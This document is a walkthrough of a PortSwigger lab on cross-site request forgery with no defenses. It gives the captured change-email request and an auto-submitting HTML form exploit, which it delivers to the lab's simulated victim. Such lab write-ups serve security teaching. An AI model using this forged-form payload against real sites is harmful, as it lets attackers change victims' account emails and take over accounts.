[This lab](https://portswigger.net/web-security/csrf/lab-no-defenses) demonstrates a classic **CSRF (Cross-Site Request Forgery)** vulnerability where an authenticated user can be tricked into submitting a forged `POST` request via a malicious page. With **no anti-CSRF token or SameSite protection**, this is easily exploitable using an auto-submitting HTML form.
#### Step 1: Log In and Capture the Request
1. In Burp’s browser, log in as:
```
Username: wiener
Password: peter
```
2. Go to **My Account → Change Email**
3. Submit a new email (e.g., `
[email protected]`)
4. In **Proxy → HTTP history**, find the `POST /my-account/change-email` request:
```http
POST /my-account/change-email HTTP/1.1
Host: YOUR-LAB-ID.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Cookie: session=...
[email protected]
```
---
#### Step 2: Build the Exploit HTML
Generate CSRF PoC and use this part:
![[CleanShot 2025-04-18 at 18.40.23 1.png]]
Or use this template:
```html
<form method="POST" action="https://YOUR-LAB-ID.web-security-academy.net/my-account/change-email">
<input type="hidden" name="email" value="
[email protected]">
</form>
<script>
document.forms[0].submit();
</script>
```
Replace `YOUR-LAB-ID` with the actual domain of the lab.
✅ Make sure `
[email protected]` is **not the email you used while testing** (or it will fail with "email already in use").
---
#### Step 3: Upload and Test the Exploit
1. Go to the **Exploit Server**
2. Paste the above HTML into the **"Body"** field
3. Click **"Store"**
4. Click **"View exploit"** to test it on your own session (you should see your email changed)
---
#### Step 4: Deliver to Victim
1. Edit the email in the payload to something unique like `
[email protected]`
2. Click **"Deliver to victim"**
✅ Lab will show **"Solved"** once the victim has loaded the CSRF page and had their email changed.